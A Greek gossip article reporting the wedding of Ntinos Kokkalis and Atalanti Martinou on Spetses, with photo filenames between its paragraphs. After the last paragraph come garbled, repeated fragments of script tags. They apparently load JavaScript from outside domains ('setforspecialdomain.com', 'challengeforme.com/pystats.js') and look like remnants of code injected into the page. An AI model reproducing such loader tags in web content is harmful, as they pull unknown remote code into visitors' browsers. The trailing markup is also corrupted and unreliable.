Φωτογραφίες από τον εφοπλιστικό γάμο των γόνων Κόκκαλη-Μαρτίνου, στις Σπέτσες!

Στις Σπέτσες παντρεύτηκαν οι γόνοι των εφοπλιστικών οικογενειών Κόκκαλη και Μαρτίνου.

ntinos_kokkalis_1.jpg
Ο λόγος για τον Ντίνο Κόκκαλη, γιο του Σωκράτη Κόκκαλη, και της Αταλάντης Μαρτίνου, που είναι κόρη της εφοπλιστικής οικογένειας Μαρτίνου.

kokkalis2.jpg
Το ζευγάρι, ενώθηκε χθες με τα ιερά δεσμά του γάμου, ενώπιον εκλεκτών καλεσμένων, και κάτω απόδρακόντεια μέτρα ασφαλείας.

ntinos_kokkalis_2.jpg
Οι νεόνυμφοι γιόρταζαν όλη την εβδομάδα το χαρμόσυνο γεγονός, με εκδηλώσεις, πάρτι και δεξιώσεις που ξεκίνησαν την Τετάρτη και κορυφώθηκαν το Σάββατο, ανήμερα του γάμου, όπου ακολούθησε δεξίωση στην παραλία της Αγίας Παρασκευής.

ntinos_kokkalis_3.jpg
Το νυφικό επιμελήθηκε γνωστός οίκος του εξωτερικού, ενώ την  επιμέλεια των προετοιμασιών, ανέλαβε η Αλεξάνδρα Μαρτίνου, μητέρα της νύφης.

ntinos_kokkalis_5 (1).jpg

Στις φωτογραφίες από το γάμο, βλέπετε τις αφίξεις εκλεκτών καλεσμένων με τις θαλαμηγούς τους στις Σπέτσες, το πολυτελές αυτοκίνητο της νύφης, αλλά και το χώρο όπου δείπνησαν μετά το γάμο οι καλεσμένοι.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >